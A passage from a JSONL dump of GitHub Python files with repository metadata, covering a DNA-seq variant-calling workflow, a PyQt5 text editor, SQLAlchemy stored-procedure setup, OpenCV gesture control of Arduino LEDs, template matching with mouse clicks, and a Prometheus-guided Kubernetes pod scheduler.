wf.add_task(dedup(sample), name=f'dedup-{sample}', depends=[mapping.task_id, locus_get.task_id])\n        args['t'].value = top_vars['thread_number']\n        args['bam'].value = mapping.outputs['out']\n        args['score'].value = locus_get.outputs['score']\n\n        # coverage; if no intervals file is provided, this step is not recommended: it takes long and produces huge output\n        cov_task, args = wf.add_task(coverage_metrics(sample), name=f'covMetrics-{sample}', depends=[dedup_task.task_id])\n        args['t'].value = top_vars['thread_number']\n        args['intervals'].value = [top_vars['intervals']]\n        args['bam'].value = dedup_task.outputs['out_bam']\n        args['ref'].value = top_vars['ref']\n\n        # realign\n        if wf.args.realign:\n            realign_task, args = wf.add_task(realign(sample), name=f'realign-{sample}', depends=[dedup_task.task_id])\n            args['t'].value = top_vars['thread_number']\n            args['bam'].value = dedup_task.outputs['out_bam']\n            args['ref'].value = top_vars['ref']\n            args['database'].value = [top_vars['known_indels'], top_vars['known_mills']]\n\n        # recalibration\n        depend_task = realign_task if wf.args.realign else dedup_task\n        recal_task, args = 
wf.add_task(recalibration(sample), name=f'recal-{sample}', depends=[depend_task.task_id])\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bam'].value = depend_task.outputs['out_bam']\n args['ref'].value = top_vars['ref']\n args['database'].value = [top_vars['known_dbsnp'], top_vars['known_indels'], top_vars['known_mills']]\n recal_dict[sample] = recal_task\n bam_dict[sample] = depend_task\n\n if not bam_dict:\n raise Exception('No sample found in Pair info file')\n\n for tumor_sample, normal_sample in pair_list:\n if tumor_sample not in bam_dict and tumor_sample.lower() != 'none':\n print(f'Warning: skip tumor sample {tumor_sample} since it is not in target list: {list(bam_dict.keys())}')\n continue\n if normal_sample not in bam_dict and normal_sample.lower() != 'none':\n print(f'Warning: skip normal sample {normal_sample} since it is not in target list: {list(bam_dict.keys())}')\n continue\n\n # germline variant calling\n if normal_sample.lower() != 'none':\n # haplotyper\n hap_task, args = wf.add_task(Haplotyper(normal_sample), name=f'haplotyper-{normal_sample}',\n depends=[bam_dict[normal_sample].task_id, recal_dict[normal_sample].task_id])\n args['ref'].value = top_vars['ref']\n args['bam'].value = bam_dict[normal_sample].outputs['out_bam']\n args['recal_data'].value = recal_dict[normal_sample].outputs['recal_data']\n args['intervals'].value = [top_vars['intervals']]\n args['emit_mode'].value = 'gvcf'\n\n # gvcf-typer\n germline_task, args = wf.add_task(GVCFtyper(normal_sample), name=f'gvcfTyper-{normal_sample}', depends=[hap_task.task_id])\n args['ref'].value = top_vars['ref']\n args['known_dbsnp'].value = top_vars['known_dbsnp']\n args['in_gvcf'].value = [hap_task.outputs['out_vcf']]\n\n # vep annotation\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(normal_sample), name=f'vep-{normal_sample}',\n depends=[germline_task.task_id])\n args['input_file'].value = germline_task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n args['filter_common'].value = False\n\n # tumor-normal pair calling\n if normal_sample.lower() != 'none' and tumor_sample.lower() != 'none':\n task, args = wf.add_task(TNhaplotyper2(tumor_sample=tumor_sample), name=f'TNhaplotyper2-{tumor_sample}')\n task.depends = [bam_dict[normal_sample].task_id, bam_dict[tumor_sample].task_id]\n task.depends += [recal_dict[normal_sample].task_id, recal_dict[tumor_sample].task_id]\n args['ref'].value = top_vars['ref']\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bams'].value = [bam_dict[normal_sample].outputs['out_bam'], bam_dict[tumor_sample].outputs['out_bam']]\n args['recal_datas'].value = [recal_dict[normal_sample].outputs['recal_data'], recal_dict[tumor_sample].outputs['recal_data']]\n args['normal_sample'].value = normal_sample\n # pon and germline\n args['pon'].value = top_vars['pon']\n args['germline_vcf'].value = top_vars['germline_vcf']\n # orientation\n args['orientation_sample'].value = tumor_sample\n args['orientation_data'].value = f'{tumor_sample}.orientation.data'\n # contamination\n if wf.args.germline_vcf:\n args['germline_vcf2'].value = top_vars['germline_vcf']\n args['contamination_tumor'].value = tumor_sample\n args['contamination_normal'].value = normal_sample\n args['contamination_data'].value = 
f'{tumor_sample}.contamination.data'\n args['tumor_segments'].value = f'{tumor_sample}.contamination.segments'\n\n # filter\n depend_task = task\n filter_task, args = wf.add_task(TNfilter(tumor_sample), name=f'tnfilter-{tumor_sample}', depends=[depend_task.task_id])\n args['ref'].value = top_vars['ref']\n args['normal_sample'].value = normal_sample\n args['tmp_vcf'].value = depend_task.outputs['out_vcf']\n if wf.args.germline_vcf:\n args['contamination'].value = depend_task.outputs['contamination_data']\n args['tumor_segments'].value = depend_task.outputs['tumor_segments']\n args['orientation_data'].value = depend_task.outputs['orientation_data']\n\n # annotation of somatic variant with VEP\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(tumor_sample), name=f'vep-{tumor_sample}', depends=[filter_task.task_id])\n args['input_file'].value = filter_task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n\n # tumor only analysis\n if normal_sample.lower() == 'none' and tumor_sample.lower() != 'none':\n task, args = wf.add_task(TNhaplotyper2(tumor_sample=tumor_sample), name=f'TNhaplotyper2-{tumor_sample}')\n task.depends = [bam_dict[tumor_sample].task_id]\n task.depends += [recal_dict[tumor_sample].task_id]\n args['ref'].value = top_vars['ref']\n args['t'].value = top_vars['thread_number']\n args['intervals'].value = [top_vars['intervals']]\n args['bams'].value = [bam_dict[tumor_sample].outputs['out_bam']]\n args['recal_datas'].value = [recal_dict[tumor_sample].outputs['recal_data']]\n # pon and germline\n args['pon'].value = top_vars['pon']\n args['germline_vcf'].value = top_vars['germline_vcf']\n\n # annotation of somatic variant with VEP\n if wf.args.vep_cache_dir and wf.args.vep_plugin_dir:\n vep_task, args = wf.add_task(vep(tumor_sample), name=f'vep-{tumor_sample}', depends=[task.task_id])\n args['input_file'].value = task.outputs['out_vcf']\n args['fasta'].value = top_vars['ref']\n args['dir_cache'].value = top_vars['vep_cache_dir']\n args['dir_plugins'].value = top_vars['vep_plugin_dir']\n\n # run workflow\n wf.run()\n\n\nif __name__ == '__main__':\n pipeline()\n","repo_name":"gudeqing/basefly","sub_path":"dnaseq/dnaseq.py","file_name":"dnaseq.py","file_ext":"py","file_size_in_byte":47497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10720428690","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\r\nfrom PyQt5.uic import loadUi\r\nimport sys\r\n\r\nclass Main(QMainWindow):\r\n def __init__(self):\r\n super(Main, self).__init__()\r\n loadUi(\"main.ui\", self)\r\n \r\n self.current_path = None \r\n self.current_fontsize = 8\r\n self.setWindowTitle(\"Untitled\")\r\n \r\n self.actionNew.triggered.connect(self.newFile)\r\n self.actionSave.triggered.connect(self.saveFile)\r\n self.actionSave_as.triggered.connect(self.saveFileAs)\r\n self.actionOpen.triggered.connect(self.openFile)\r\n self.actionUndo.triggered.connect(self.undo)\r\n self.actionRedo.triggered.connect(self.redo)\r\n self.actionCut.triggered.connect(self.cut)\r\n self.actionCopy.triggered.connect(self.copy)\r\n self.actionPaste.triggered.connect(self.paste)\r\n self.actionSet_Dark_Mode.triggered.connect(self.setDarkMode)\r\n self.actionSet_Light_Mode.triggered.connect(self.setLightMode)\r\n self.actionIncrease_Font_Size.triggered.connect(self.incFontSize)\r\n 
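The dnaseq record that closes above is driven entirely by its argument parser; a plausible minimal invocation using only the flags that pipeline() marks as required could look like the sketch below (all file paths are illustrative placeholders, only the flag names come from pipeline()):

import subprocess

# Hypothetical inputs; adjust paths to your environment.
subprocess.run([
    'python', 'dnaseq.py',
    '-fastq_info', '/data/fastq_dir',
    '-pair_info', 'pairs.txt',  # two columns: tumor_sample <tab> normal_sample
    '-ref', 'hg19.fa',
    '-dbsnp', 'dbsnp.vcf.gz',
    '-known_indels', 'known_indels.vcf.gz',
    '-known_mills', 'mills.vcf.gz',
], check=True)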
self.actionDecrease_Font_Size.triggered.connect(self.decFontSize)\r\n\r\n\r\n def newFile(self):\r\n self.textEdit.clear()\r\n self.setWindowTitle(\"Untitled\")\r\n self.current_path = None\r\n\r\n def saveFile(self):\r\n if self.current_path is not None:\r\n # save the changes without opening dialog\r\n filetext = self.textEdit.toPlainText()\r\n with open(self.current_path, 'w') as f:\r\n f.write(filetext)\r\n else:\r\n self.saveFileAs()\r\n\r\n def saveFileAs(self):\r\n pathname = QFileDialog.getSaveFileName(self, 'Save file', 'D:\\codefirst.io\\PyQt5 Text Editor', 'Text files(*.txt)')\r\n filetext = self.textEdit.toPlainText()\r\n with open(pathname[0], 'w') as f:\r\n f.write(filetext)\r\n self.current_path = pathname[0]\r\n self.setWindowTitle(pathname[0])\r\n\r\n def openFile(self):\r\n fname = QFileDialog.getOpenFileName(self, 'Open file', 'D:\\codefirst.io\\PyQt5 Text Editor', 'Text files (*.txt)')\r\n self.setWindowTitle(fname[0])\r\n with open(fname[0], 'r') as f:\r\n filetext = f.read()\r\n self.textEdit.setText(filetext)\r\n self.current_path = fname[0]\r\n\r\n def undo(self):\r\n self.textEdit.undo()\r\n\r\n def redo(self):\r\n self.textEdit.redo()\r\n\r\n def copy(self):\r\n self.textEdit.copy()\r\n\r\n def cut(self):\r\n self.textEdit.cut()\r\n\r\n def paste(self):\r\n self.textEdit.paste()\r\n\r\n def setDarkMode(self):\r\n self.setStyleSheet('''QWidget{\r\n background-color: rgb(33,33,33);\r\n color: #FFFFFF;\r\n }\r\n QTextEdit{\r\n background-color: rgb(46,46,46);\r\n }\r\n QMenuBar::item:selected{\r\n color: #000000\r\n } ''')\r\n\r\n def setLightMode(self):\r\n self.setStyleSheet(\"\") \r\n\r\n def incFontSize(self):\r\n self.current_fontsize +=1\r\n self.textEdit.setFontPointSize(self.current_fontsize)\r\n \r\n def decFontSize(self):\r\n self.current_fontsize -=1\r\n self.textEdit.setFontPointSize(self.current_fontsize)\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ui = Main()\r\n ui.show()\r\n app.exec_()\r\n","repo_name":"codefirstio/pyqt5-text-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33515488793","text":"# (c) 2014 Amplify Education, Inc. 
All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n'''\nCreated on Jun 6, 2013\n\n@author: swimberly\n'''\nimport datetime\nfrom sqlalchemy.sql.expression import select, bindparam\nfrom sqlalchemy.exc import ProgrammingError\nfrom edudl2.rule_maker.rules.transformation_code_generator import generate_transformations\nfrom edudl2.database.udl2_connector import get_udl_connection\n\n\ndef populate_ref_column_map(conf_dict, ref_table_name):\n    '''\n    Load the column mapping data to the specified reference table\n    @param conf_dict: dict containing keys 'column_mappings'(the data) & 'column_definitions'(the column info)\n    the column definition information should not contain columns that are populated by db\n    @param ref_table_name: the name of the reference table for column mapping data\n    '''\n    with get_udl_connection() as conn:\n        col_map_table = conn.get_table(ref_table_name)\n        col_map_data = conf_dict['column_mappings']\n        col_map_columns = conf_dict['column_definitions']\n\n        for row in col_map_data:\n            row_map = {}\n            for i in range(len(row)):\n                row_map[col_map_columns[i]] = row[i]\n            conn.execute(col_map_table.insert(row_map))\n\n\ndef populate_stored_proc(*ref_tables):\n    '''\n    Generate and load stored procedures into the database\n    @param ref_tables: the names of the reference tables containing the column mapping info\n    @return: A list of tuples: (rule_name, proc_name)\n    @rtype: list\n    '''\n    # TODO Use a transaction instead\n    with get_udl_connection() as conn:\n        # get unique list of transformation rules from all ref tables\n        trans_rules = set()\n        for ref_table_name in ref_tables:\n            trans_rules.update(get_transformation_rule_names(ref_table_name))\n\n        # get list of stored procedures and code to generate\n        proc_list = generate_transformations(trans_rules)\n        rule_map_list = []\n\n        # Create transaction\n        trans = conn.get_transaction()\n        try:\n            # add each procedure to db\n            for proc in proc_list:\n                if proc:\n                    rule_name = proc[0]\n                    proc_name = proc[1]\n                    proc_sql = proc[2]\n                    print('Creating function:', proc_name)\n\n                    # execute sql and add the mapping to the list\n                    try:\n                        conn.execute(proc_sql)\n                        rule_map_list.append((rule_name, proc_name))\n                    except ProgrammingError as e:\n                        print('UNABLE TO CREATE FUNCTION: %s, Error: \"%s\"' % (proc_name, e))\n\n            # commit session\n            trans.commit()\n        except:\n            trans.rollback()\n            raise\n\n    # update tables with stored proc names\n    for ref_table_name in ref_tables:\n        update_column_mappings(rule_map_list, ref_table_name)\n\n    return rule_map_list\n\n\ndef get_transformation_rule_names(ref_table_name):\n    '''\n    Get a list of all used transformation rule names from the database\n    @param ref_table_name: the name of the reference table containing the column mapping info\n    @return: The list of transformation rules without duplicates\n    @rtype: list\n    '''\n    with get_udl_connection() as conn:\n        # get column_mapping table object\n        col_map_table = conn.get_table(ref_table_name)\n        trans_rules = []\n\n        # Create select statement to get distinct transformation rules\n        select_stmt = select([col_map_table.c.transformation_rule]).distinct()\n\n        # Put each rule in list and return\n        for row in conn.execute(select_stmt):\n            rule = row[0]\n            if rule:\n                trans_rules.append(rule)\n\n    return trans_rules\n\n\ndef update_column_mappings(rule_map_list, ref_table_name):\n    '''\n    loop through the column mapping rows in the database and populate the\n    stored procedure column based on the transformation name\n    @param rule_map_list: A list of tuples containing mapping info. Tuples should be: (rule_name, proc_name)\n    @param ref_table_name: the name of the reference table containing the column mapping info\n    '''\n\n    # check that list is not empty before proceeding.\n    if not rule_map_list:\n        print('NO FUNCTIONS ADDED TO DATABASE')\n        return\n    with get_udl_connection() as conn:\n        # get column_mapping table object\n        col_map_table = conn.get_table(ref_table_name)\n\n        # Generate sql to perform update\n        update_stmt = col_map_table.update().where(col_map_table.c.transformation_rule == bindparam('rule_name'))\n        update_stmt = update_stmt.values(stored_proc_name=bindparam('proc_name'), stored_proc_created_date=datetime.datetime.now())\n\n        # Create list of dicts that sqlalchemy will recognize\n        # to update all rules with corresponding stored procedure.\n        for pair in rule_map_list:\n            conn.execute(update_stmt, rule_name=pair[0], proc_name=pair[1])\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/edudl2/database/populate_ref_info.py","file_name":"populate_ref_info.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5745548178","text":"import cv2\nimport pyfirmata\nfrom cvzone.HandTrackingModule import HandDetector\nfrom cvzone.FPS import FPS\n\ncap = cv2.VideoCapture(0)\n#Set size screen\nx_max, y_max = 1280, 720\ncap.set(3, x_max)\ncap.set(4, y_max)\n\nif not cap.isOpened():\n    print(\"Camera couldn't be accessed\")\n    exit()\n\nfpsReader = FPS()\nfps = fpsReader.update()\n\ndetector = HandDetector(detectionCon=0.7)\npinR, pinY, pinG = 2, 3, 4\nport = 'COM7' #Select your COM\nboard = pyfirmata.Arduino(port)\n\ncounter_R, counter_Y, counter_G = 0, 0, 0\nR_on, Y_on, G_on = False, False, False\n\nwhile True:\n    success, img = cap.read()\n    img = cv2.flip(img, 1)\n    img = detector.findHands(img)\n    fps, img = fpsReader.update(img)\n    lmList, bboxInfo = detector.findPosition(img)\n\n    if lmList :\n        x, y = 100, 100\n        w, h = 225, 225\n        X, Y = 120, 190\n\n        fx, fy = lmList[8][0], lmList[8][1] #index fingertip\n        posFinger = [fx, fy]\n        cv2.circle(img, (fx, fy), 15, (255, 0, 255), cv2.FILLED) #draw circle on index fingertip\n        cv2.putText(img, str(posFinger), (fx+10, fy-10), cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 0), 3)\n        # cv2.line(img, (0, fy), (x_max, fy), (255,255,0), 2) # x line\n        # cv2.line(img, (fx, y_max), (fx, 0), (255, 255, 0), 2)# y line\n\n\n        if x < 
fx < x + w - 95 and y < fy < y + h - 95:\n            counter_R += 1\n            cv2.rectangle(img, (x, y), (w, h), (255, 255, 0), cv2.FILLED)\n            if counter_R == 1:\n                R_on = not R_on\n        else :\n            counter_R = 0\n        if R_on:\n            R_val = 1\n            cv2.rectangle(img, (x, y), (w, h), (0, 0, 255), cv2.FILLED)\n            cv2.putText(img, \"ON\", (X, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (255, 255, 255), 5)\n        else:\n            R_val = 0\n            cv2.rectangle(img, (x, y), (w, h), (150, 150, 150), cv2.FILLED)\n            cv2.putText(img, \"OFF\", (X-15, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (0, 0, 255), 5)\n\n        if x + 250 < fx < x + 155 + w and y < fy < y + h - 95: #155 = 250 - 95\n            counter_Y += 1\n            cv2.rectangle(img, (x + 250, y), (w + 250, h), (255, 255, 0), cv2.FILLED)\n            if counter_Y == 1:\n                Y_on = not Y_on\n        else:\n            counter_Y = 0\n        if Y_on:\n            Y_val = 1\n            cv2.rectangle(img, (x+250, y), (w+250, h), (0, 255, 255), cv2.FILLED)\n            cv2.putText(img, \"ON\", (X+250, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (255, 255, 255), 5)\n        else:\n            Y_val = 0\n            cv2.rectangle(img, (x + 250, y), (w + 250, h), (150, 150, 150), cv2.FILLED)\n            cv2.putText(img, \"OFF\", (X-15 + 250, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (0, 255, 255), 5)\n\n        if x + 500 < fx < x + 405 + w and y < fy < y + h - 95: #500 - 95 = 405\n            counter_G += 1\n            cv2.rectangle(img, (x + 500, y), (w + 500, h), (255, 255, 0), cv2.FILLED)\n            if counter_G == 1:\n                G_on = not G_on\n\n        else:\n            counter_G = 0\n        if G_on:\n            G_val = 1\n            cv2.rectangle(img, (x + 500, y), (w + 500, h), (0, 255, 0), cv2.FILLED)\n            cv2.putText(img, \"ON\", (X + 500, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (255, 255, 255), 5)\n        else:\n            G_val = 0\n            cv2.rectangle(img, (x + 500, y), (w + 500, h), (150, 150, 150), cv2.FILLED)\n            cv2.putText(img, \"OFF\", (X-15 + 500, Y), cv2.FONT_HERSHEY_PLAIN,\n                        4, (0, 255, 0), 5)\n\n        board.digital[pinR].write(R_val)\n        board.digital[pinY].write(Y_val)\n        board.digital[pinG].write(G_val)\n\n\n    cv2.imshow(\"Image\", img)\n    cv2.waitKey(1)\n\n","repo_name":"rizkydermawan1992/virtual-button-opencv","sub_path":"LEDSerialArduino.py","file_name":"LEDSerialArduino.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"39469833281","text":"from PIL import Image\r\nimport os\r\nimport sys\r\n#Object detection\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\n#Click windows\r\nimport ctypes\r\n#https://dotnetcoretutorials.com/2018/07/21/uploading-images-in-a-pure-json-api/\r\n\r\n#OCR\r\n#handwriting tensorflow\r\n#https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/\r\ndef ResizeImage(findImage_path):\r\n    src = cv.imread(findImage_path, cv.IMREAD_UNCHANGED)\r\n    #Resize the image (from 10% to 120% of the image size)\r\n    #linspace interpolates from 0.1 to 1.2 in 15 steps\r\n    #[::-1] reverses the range (starts at the last element and ends at the first)\r\n    for scale in np.linspace(0.4, 0.8, 15)[::-1]:\r\n        width = int(src.shape[1] * scale)\r\n        height = int(src.shape[0] * scale)\r\n        # dsize\r\n        dsize = (width, height)\r\n        output = cv.resize(src, dsize)\r\n        #cv.imshow(\"imagen\",output)\r\n        #cv.waitKey(0)\r\n\r\ndef MatchingMultipleObjects (allImage,findImage):\r\n    img_rgb = cv.imread(allImage) \r\n    img_gray = cv.cvtColor(img_rgb, cv.COLOR_BGR2GRAY)\r\n    #cv.imshow('image',img_rgb)\r\n    #cv.waitKey(0)\r\n\r\n    #template = cv.imread(findImage,0)\r\n    template_rgb = cv.imread(findImage)\r\n    template = cv.cvtColor(template_rgb, cv.COLOR_BGR2GRAY)\r\n\r\n    print(img_gray.shape[::-1])\r\n    w, h = template.shape[::-1]\r\n    wi,he=img_gray.shape[::-1]\r\n    #Resize the image (from 10% to 130% of the image size)\r\n    #linspace interpolates from 0.2 to 1.3 in 20 steps\r\n    #[::-1] reverses the range (starts at the last element and ends at the first)\r\n    for scale in np.linspace(0.2, 1.3, 20)[::-1]:\r\n        width = int(template.shape[1] * scale)\r\n        height = int(template.shape[0] * scale)\r\n        \r\n        if(width<wi and height<he):\r\n            dsize = (width, height)\r\n            template_scaled = cv.resize(template, dsize)\r\n            res = cv.matchTemplate(img_gray, template_scaled, cv.TM_CCOEFF_NORMED)\r\n            threshold = 0.8\r\n            loc = np.where( res >= threshold) \r\n        #variable that counts the number of objects found in the image\r\n        numero_objeto=int(1)\r\n        for pt in zip(*loc):\r\n            # Start coordinate, here (100, 50)\r\n            # represents the top left corner of rectangle\r\n            start_point = (pt[1],pt[0]) \r\n            print('start_point:' +str(start_point)) \r\n            # Ending coordinate, here (125, 80)\r\n            # represents the bottom right corner of rectangle\r\n            end_point = (pt[1] + w, pt[0] + h)\r\n            print('end_point:' +str(end_point)) \r\n            cv.rectangle(img_rgb, start_point, end_point, (0,0,255), 2)\r\n            cv.imwrite('resultado'+str(numero_objeto)+'.jpg',img_rgb)\r\n            #Image center coordinates\r\n            print('Location of image center #=%x' % numero_objeto + ' Center X=%f' % (pt[1] + w/2) + ' Y=%d' % (pt[0] + h/2) )\r\n            numero_objeto +=1\r\n\r\n    \"\"\"\r\n\r\n    res = cv.matchTemplate(img_gray,template,cv.TM_CCOEFF_NORMED)\r\n    threshold = 0.8\r\n    loc = np.where( res >= threshold) \r\n    #variable that counts the number of objects found in the image\r\n    numero_objeto=int(1)\r\n    for pt in zip(*loc[::-1]):\r\n        cv.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2)\r\n        print('Location of image center #=%x' % numero_objeto + ' Center X=%f' % (pt[0] + w/2) + ' Y=%d' % (pt[0] + h/2) )\r\n        numero_objeto +=1\r\n    cv.imwrite('resultado.jpg',img_rgb)\r\n    print('End of execution')\r\n    \r\n    \"\"\"\r\n\r\ndef pathExit(pathUser):\r\n    n=os.path.exists(pathUser)\r\n    return n\r\n\r\n\r\n\r\n\r\n\r\ndef left_click(x, y, clicks=1):\r\n    SetCursorPos = ctypes.windll.user32.SetCursorPos\r\n    mouse_event = ctypes.windll.user32.mouse_event\r\n    SetCursorPos(x, y)\r\n    for i in range(clicks):\r\n        mouse_event(2, 0, 0, 0, 0)\r\n        mouse_event(4, 0, 0, 0, 0)\r\nif __name__ == \"__main__\":\r\n    #\r\n    imageScreen= os.path.abspath(os.getcwd()) + r'\\BuscarImagen\\resultado.jpg'\r\n    if pathExit(imageScreen)==False:\r\n        sys.exit()\r\n    findImage=os.path.abspath(os.getcwd()) + r'\\BuscarImagen\\Refresh_ConsultaRucMovil2.jpg'\r\n    if pathExit(findImage)==False:\r\n        sys.exit()\r\n    MatchingMultipleObjects(imageScreen,findImage)\r\n\r\n    #left_click(550, 275)\r\n    #left_click(275, 275)\r\n\r\n","repo_name":"fernando12170209/BuscarImagen_TemplateMatch","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74244969447","text":"#!/usr/bin/env python3\n\nfrom kubernetes import client,config,watch\nfrom os import environ as ENV\nfrom helper.PrometheusNodeSelector import PrometheusNodeSelector as pns\nfrom kubernetes.client.rest import ApiException\nfrom helper.GenericStatsCollector import GenericStatsCollector\nfrom helper.SchedulerDecorator import backoff\nimport helper.logit as logit\n\n__author__ = \"Kyle Martin (kdmarti2)\"\n\n\nlogging = logit.get_logger()\n##\n#Globals\n##\n\n##\n#Set by the environment\n#Tetris Scheduler Lookup String\n##\nscheduler_cpu = None\nscheduler_mem = None\nscheduler_io = None\n\n##\n#Set By The Environment\n#Determines which namespace tetris looks at for pending pods\n##\nnamespace = 
None\n\n##\n#PrometheusNodeSelector Object Class that handles the contacting of Prometheus\n#and selecting which node has the lowest predicted workload\n##\ncpu_model = None\nmem_model = None\nIO_model = None\n\n##\n#Object Class to interact with Kubernetes\n##\nv1_api = None\n\n##\n#End of Globals\n##\n\n\n##\n#@Ret String get_nodes(p object)\n#This function will first query for all available and ready nodes in the K8s cluster\n#Determine the internal IP address of these nodes and associate this internal IP address\n#to the DNS name that K8s will use. We need this association because Prometheus uses\n#IP addresses to identify separate nodes, not DNS names like K8s does. This allows\n#me to have K8s and Prometheus talk the same language. Once this dictionary is filled\n#call node_selection to select a node to place a container on.\n##\ndef get_nodes(p):\n    logging.info(\"Getting Nodes\")\n\n    ready_nodes = {}\n    ##\n    #Step 2 - Getting a list of ready nodes\n    ##\n    for k8_node in v1_api.list_node().items:\n        for status in k8_node.status.conditions:\n            if status.status == \"True\" and status.type == \"Ready\":\n                for addr in k8_node.status.addresses:\n                    if addr.type == 'InternalIP':\n                        logging.info(\"Found Node {0}:{1} is Ready!\".format(k8_node.metadata.name,addr.address))\n                        ready_nodes[addr.address]= k8_node.metadata.name\n                break;\n            else:\n                logging.warning(\"Node {0} is not available\".format(k8_node.metadata.name))\n\n    return p.node_selection(ready_nodes)\n\n##\n#@backoff - See SchedulerDecorator.py\n#This is to prevent wasted time and effort on scheduling a pod that has already been scheduled\n#Also used to handle weird error handling cases\n#\n#Scheduler(string,Object,String)\n#@name - name represents the name of the pod to provision onto a node\n#@model - which node selector to use to determine the node with the lowest predicted workload\n#@ns - namespace that the pod to be provisioned is in\n##\n@backoff\ndef scheduler(name,model,ns):\n\n    ##\n    #Step 3 - Selecting a node\n    ##\n    node = get_nodes(model)\n    logging.info(\"Putting {0} on {1} in namespace: {2}\".format(name,node,ns))\n    \n    #\n    #https://github.com/kubernetes-client/python/issues/547\n    #https://github.com/kubernetes-client/python/issues/547#issuecomment-455362558\n    ##\n\n    target = client.V1ObjectReference()\n    target.kind = \"Node\"\n    target.apiVersion = \"v1\"\n    target.name = node\n\n    meta = client.V1ObjectMeta()\n    meta.name = name\n    body = client.V1Binding(target=target,metadata=meta)\n\n    ##\n    #Step 4 - Bind the pod to a node\n    #Finished\n    ##\n    return v1_api.create_namespaced_binding(namespace=ns,body=body)\n\n##\n#@init - function sets the globals and retrieves configuration environment variables\n#at startup.\n##\ndef init():\n    ##\n    #Globals\n    ##\n    global scheduler_cpu\n    global scheduler_mem\n    global scheduler_io\n\n    global model_cpu\n    global model_mem\n    global model_io\n\n    global namespace\n\n    global v1_api\n\n    prometheus_api = None;\n\n    if \"SCHEDULER_NAME\" in ENV:\n        scheduler_base = ENV.get(\"SCHEDULER_NAME\")\n    else:\n        scheduler_base = \"tetris-scheduler\"\n\n    if \"PROMETHEUS_API\" in ENV:\n        prometheus_api = ENV.get(\"PROMETHEUS_API\")\n    else:\n        prometheus_api = \"http://127.0.0.1:9580/api\";\n\n    scheduler_cpu = scheduler_base + \"-cpu\"\n    scheduler_mem = scheduler_base + \"-mem\"\n    scheduler_io = scheduler_base + \"-io\"\n    \n    log_collector = GenericStatsCollector()\n\n    model_cpu = pns(\"cpu\",prometheus_api,log_collector)\n    model_mem = pns(\"mem\",prometheus_api,log_collector)\n    model_io = pns(\"io\",prometheus_api,log_collector)\n\n\n    if \"NAMESPACE\" in ENV:\n        namespace = ENV.get(\"NAMESPACE\")\n    else:\n        namespace = \"default\"\n\n    config.load_kube_config()\n    v1_api = client.CoreV1Api()\n\n##\n#@main - Function runs forever to find new pods to provision on available K8s Nodes\n##\n#Citation: https://sysdig.com/blog/kubernetes-scheduler/\n#The following link was used as a guide to extract the four steps in making a Kubernetes scheduler.\n##\ndef main():\n    init();\n\n    logging.basicConfig(level=logging.INFO)\n    logging.info(\"Starting to schedule pods for Tetris in namespace: {0}\".format(namespace))\n    w = watch.Watch()\n\n    ##\n    #Step 1 - Find a pod in a pending state\n    #\n    #Only provision pods that want to use our scheduler\n    #tetris-scheduler-cpu\n    #tetris-scheduler-io\n    #tetris-scheduler-mem\n    ##\n    while True:\n        for event in w.stream(v1_api.list_namespaced_pod,namespace):\n            logging.info(\"Event Triggered. Phase: {0} scheduler_name: {1}\".format(event['object'].status.phase,event['object'].spec.scheduler_name))\n            if event['object'].status.phase == \"Pending\":\n                \n                if event['object'].spec.scheduler_name == scheduler_cpu:\n                    scheduler(event['object'].metadata.name,model_cpu,namespace)\n                elif event['object'].spec.scheduler_name == scheduler_mem:\n                    scheduler(event['object'].metadata.name,model_mem,namespace)\n                elif event['object'].spec.scheduler_name == scheduler_io:\n                    scheduler(event['object'].metadata.name,model_io,namespace)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"kaizoku-o/io_predictive_kubernetes","sub_path":"scheduler/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32140949838","text":"import sys\n\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import 